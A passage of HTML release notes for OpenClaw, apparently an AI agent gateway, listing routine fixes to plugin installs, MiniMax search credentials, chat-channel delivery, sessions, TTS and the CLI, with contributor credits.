<p>Web search/MiniMax: include MiniMax Search in the web-search setup flow and let <code>MINIMAX_API_KEY</code> participate in MiniMax Search auto-detection. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252993330" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65828" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65828/hovercard" href="https://github.com/openclaw/openclaw/pull/65828">#65828</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: preserve official source-linked trust through archive installs, so OpenClaw can install trusted ClawHub plugin packages that trigger the built-in dangerous-pattern scanner. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: install package runtime dependencies for archive-backed plugin installs, so ClawHub packages such as WhatsApp load declared dependencies after download. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/tools: cache repeated plugin tool factory results only for matching request context, reducing per-turn tool prep without leaking sandbox, session, browser, delivery, or runtime config state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367960262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75956/hovercard" href="https://github.com/openclaw/openclaw/issues/75956">#75956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Providers/LM Studio: allow <code>models.providers.lmstudio.params.preload: false</code> to skip OpenClaw's native model-load call so LM Studio JIT loading, idle TTL, and auto-evict can own model lifecycle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367728807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75921/hovercard" href="https://github.com/openclaw/openclaw/issues/75921">#75921</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>.</p>
</li>
<li>
<p>Agents/transcripts: keep chat history, restart recovery, fork token checks, and stale-token compaction checks on bounded async transcript reads or cached async indexes instead of reparsing large session files. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Telegram: inherit the process DNS result order for Bot API transport and downgrade recovered sticky IPv4 fallback promotions to debug logs, while keeping pinned-IP escalation warnings visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367563919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75904" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75904/hovercard" href="https://github.com/openclaw/openclaw/issues/75904">#75904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/highfly-hi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/highfly-hi">@highfly-hi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</p>
</li>
<li>
<p>Sessions: keep durable external conversation pointers, including group and thread-scoped chat sessions, out of age, count, and disk-budget maintenance eviction while still allowing synthetic runtime entries to age out. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175356638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58088/hovercard" href="https://github.com/openclaw/openclaw/issues/58088">#58088</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drinkflav/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drinkflav">@drinkflav</a>.</p>
</li>
<li>
<p>Web search/MiniMax: allow <code>MINIMAX_OAUTH_TOKEN</code> to satisfy MiniMax Search credentials, so OAuth-authorized MiniMax Token Plan setups do not need a separate web-search key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252008941" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65768" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65768/hovercard" href="https://github.com/openclaw/openclaw/issues/65768">#65768</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kikibrian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kikibrian">@kikibrian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>.</p>
</li>
<li>
<p>Providers/MiniMax: derive Coding Plan usage polling from the configured MiniMax base URL, so global setups no longer query the CN usage host. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246049228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65054/hovercard" href="https://github.com/openclaw/openclaw/issues/65054">#65054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sixone74/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sixone74">@sixone74</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</p>
</li>
<li>
<p>Control UI/WebChat: skip assistant-media transcript supplements when stale media refs resolve to no playable media, so text-only final replies are not stored a second time as gateway-injected assistant messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347391100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73956/hovercard" href="https://github.com/openclaw/openclaw/issues/73956">#73956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</p>
</li>
<li>
<p>Sessions: reject <code>sessions_send</code> targets that resolve to thread-scoped chat sessions, so inter-agent coordination cannot be injected into active human-facing Slack or Discord threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117274546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52496/hovercard" href="https://github.com/openclaw/openclaw/issues/52496">#52496</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barry-p5cc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barry-p5cc">@barry-p5cc</a>.</p>
</li>
<li>
<p>Subagents: honor <code>sessions_spawn</code> with <code>expectsCompletionMessage: false</code> by skipping parent completion handoff delivery while still running child cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75848/hovercard" href="https://github.com/openclaw/openclaw/issues/75848">#75848</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Media/completions: treat media-only message-tool sends as delivered async completion output, avoiding duplicate raw <code>MEDIA:</code> fallback posts after video or music generation finishes.</p>
</li>
<li>
<p>Gateway/logging: keep deferred channel startup logs on the subsystem logger, so Slack, Discord, Telegram, and voice-call startup messages keep timestamped prefixes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Codex/app-server: recover JSON-RPC frames split by raw command-output newlines and include a redacted preview when malformed app-server messages still reach the console. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Replies/typing: keep typing alive for queued follow-up messages that are genuinely waiting behind an active run, instead of making chat surfaces look idle while work is queued. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251046189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65685/hovercard" href="https://github.com/openclaw/openclaw/issues/65685">#65685</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/papag00se/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/papag00se">@papag00se</a>.</p>
</li>
<li>
<p>ACP/Discord: suppress completion announce delivery for inline thread-bound ACP session runs, so Discord thread-bound ACP replies are not delivered twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204352483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60780/hovercard" href="https://github.com/openclaw/openclaw/issues/60780">#60780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a>.</p>
</li>
<li>
<p>Discord/threads: ignore webhook-authored copies in already-bound Discord session threads even when the webhook id differs, preventing PluralKit proxy copies from creating duplicate turn pressure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114424047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52005/hovercard" href="https://github.com/openclaw/openclaw/issues/52005">#52005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
<p>Discord/threads: return the created thread as partial success when the follow-up initial message fails, so agents do not retry thread creation and create empty duplicate threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084295408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48450" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48450/hovercard" href="https://github.com/openclaw/openclaw/issues/48450">#48450</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dahifi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dahifi">@dahifi</a>.</p>
</li>
<li>
<p>Discord/components: consume every button or select in a non-reusable component message after the first authorized click, so single-use panels cannot fire sibling callbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132338088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54227" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54227/hovercard" href="https://github.com/openclaw/openclaw/issues/54227">#54227</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fujiwarakasei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fujiwarakasei">@fujiwarakasei</a>.</p>
</li>
<li>
<p>macOS/config: preserve existing <code>gateway.auth</code> and unrelated config keys during app fallback writes, so dashboard or Talk settings changes cannot strand Control UI clients by dropping persisted auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364348126" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75631/hovercard" href="https://github.com/openclaw/openclaw/issues/75631">#75631</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fuma2013/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fuma2013">@Fuma2013</a>.</p>
</li>
<li>
<p>Control UI/TUI: keep reconnecting chat sends bound to the same backing session id and let TUI relaunches resume the last selected session, avoiding silent fresh sessions after refresh, reconnect, or terminal restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225359321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63195/hovercard" href="https://github.com/openclaw/openclaw/issues/63195">#63195</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283461066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68162/hovercard" href="https://github.com/openclaw/openclaw/issues/68162">#68162</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342917722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73546/hovercard" href="https://github.com/openclaw/openclaw/issues/73546">#73546</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bond260312-cmyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bond260312-cmyk">@bond260312-cmyk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhong18804784882/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhong18804784882">@zhong18804784882</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mtuwei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mtuwei">@mtuwei</a>.</p>
</li>
<li>
<p>Plugins/tools: let plugin manifests declare static tool availability so reply startup skips unavailable plugin tool runtimes instead of importing factories that only return <code>null</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord/reactions: skip reaction listener registration when DMs and group DMs are disabled and every configured guild has <code>reactionNotifications: "off"</code>, avoiding needless reaction-event queue work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078796783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47516" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47516/hovercard" href="https://github.com/openclaw/openclaw/issues/47516">#47516</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/x4v13r1120/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/x4v13r1120">@x4v13r1120</a>.</p>
</li>
<li>
<p>CLI sessions: preserve explicit manual-attach reuse bindings so trusted CLI sessions are not invalidated on the first turn when auth, prompt, or MCP fingerprints drift. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75849/hovercard" href="https://github.com/openclaw/openclaw/issues/75849">#75849</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Telegram/streaming: keep partial preview streaming enabled for plain reply-to replies, disabling drafts only for real native quote excerpts that require Telegram quote parameters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577179" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73505" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73505/hovercard" href="https://github.com/openclaw/openclaw/issues/73505">#73505</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/choury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/choury">@choury</a>.</p>
</li>
<li>
<p>Config: log the "newer OpenClaw" version warning once per process instead of once per config snapshot read. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367749952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75927" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75927/hovercard" href="https://github.com/openclaw/openclaw/pull/75927">#75927</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</p>
</li>
<li>
<p>Telegram/message actions: treat benign delete-message 400s as no-op warnings instead of runtime errors, so stale or already-removed messages do not create noisy delete failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345339727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73726" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73726/hovercard" href="https://github.com/openclaw/openclaw/issues/73726">#73726</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Avicennasis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Avicennasis">@Avicennasis</a>.</p>
</li>
<li>
<p>Telegram: split long default markdown sends and media follow-up text into safe HTML chunks, so outbound messages over Telegram's limit no longer fail as one oversized Bot API request. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367257816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75868/hovercard" href="https://github.com/openclaw/openclaw/issues/75868">#75868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhengsx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhengsx">@zhengsx</a>.</p>
</li>
<li>
<p>Gateway/chat history: merge Claude CLI transcript imports for Anthropic-routed sessions that still have a Claude CLI binding, so local chat history does not hide CLI JSONL turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367073060" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75850/hovercard" href="https://github.com/openclaw/openclaw/issues/75850">#75850</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Media: trim serialized JSON suffixes after local <code>MEDIA:</code> directive file extensions, so generated-image metadata cannot pollute the parsed media path and cause false <code>ENOENT</code> delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360047482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75182/hovercard" href="https://github.com/openclaw/openclaw/issues/75182">#75182</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TnzGit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TnzGit">@TnzGit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/runtime: hot-reload Gateway plugin runtime surfaces after plugin enable/disable changes while keeping source-changing plugin install, update, and uninstall operations restart-backed so loaded module code is not reused. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330564867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72097" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72097/hovercard" href="https://github.com/openclaw/openclaw/issues/72097">#72097</a>.</p>
</li>
<li>
<p>Cron: make scheduler reload schedule comparison tolerate malformed persisted jobs, so one bad cron entry no longer aborts the whole tick. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367497925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75886" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75886/hovercard" href="https://github.com/openclaw/openclaw/issues/75886">#75886</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samfox-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samfox-ai">@samfox-ai</a>.</p>
</li>
<li>
<p>Doctor/channels: warn after migrations when default Telegram or Discord accounts have no configured token and their env fallback (<code>TELEGRAM_BOT_TOKEN</code> or <code>DISCORD_BOT_TOKEN</code>) is unavailable, with secret-safe migration docs for checking state-dir <code>.env</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74298/hovercard" href="https://github.com/openclaw/openclaw/issues/74298">#74298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: keep idle liveness samples in telemetry instead of visible warning logs unless diagnostic work is active, waiting, or queued. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/cron: reject provider-prefixed targets for the wrong channel and let prefixed announce targets such as <code>telegram:123</code> select their channel when delivery falls back to <code>last</code>, so Telegram IDs cannot be coerced into WhatsApp phone numbers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162988650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56839/hovercard" href="https://github.com/openclaw/openclaw/issues/56839">#56839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bencoremans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bencoremans">@bencoremans</a>.</p>
</li>
<li>
<p>Control UI/chat: keep live replies visible when a raw session alias such as <code>main</code> sends the chat turn but Gateway emits events under the canonical session key for the same run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345216396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73716/hovercard" href="https://github.com/openclaw/openclaw/issues/73716">#73716</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teebes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teebes">@teebes</a>.</p>
</li>
<li>
<p>CLI/models: reject <code>--agent</code> on <code>openclaw models set</code> and <code>set-image</code> instead of silently writing agent-scoped requests to global model defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286636018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68391/hovercard" href="https://github.com/openclaw/openclaw/issues/68391">#68391</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/derrickabellard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/derrickabellard">@derrickabellard</a>.</p>
</li>
<li>
<p>CLI: stop treating the legacy singular <code>openclaw tool ...</code> token as a plugin id under restrictive <code>plugins.allow</code>, so it falls through as a normal unknown/reserved command instead of suggesting a stale allowlist entry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243981916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64732/hovercard" href="https://github.com/openclaw/openclaw/issues/64732">#64732</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SweetSophia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SweetSophia">@SweetSophia</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hashtag1974/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hashtag1974">@hashtag1974</a>.</p>
</li>
<li>
<p>Media: write inbound media buffers through same-directory temp files before rename, so failed disk writes do not leave zero-byte artifacts for later voice transcription. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4154946745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55966" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55966/hovercard" href="https://github.com/openclaw/openclaw/issues/55966">#55966</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>TTS/Telegram: keep trusted local audio generated by the TTS tool queued for voice-note delivery even when the run-level built-in tool list omits the raw <code>tts</code> name. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354905008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74752/hovercard" href="https://github.com/openclaw/openclaw/issues/74752">#74752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loveworld3033/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loveworld3033">@Loveworld3033</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</p>
</li>
<li>
<p>TTS: require explicit user or config audio intent for the agent speech tool so dashboard chats stay text unless audio is requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303803702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69777/hovercard" href="https://github.com/openclaw/openclaw/issues/69777">#69777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>Plugins/config: keep bundled source-checkout plugins from being runtime-gated by install-only <code>minHostVersion</code> metadata, accept prerelease host floors, trim plugin-service startup failures to one log line, and avoid broad channel-runtime loading during base config parsing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
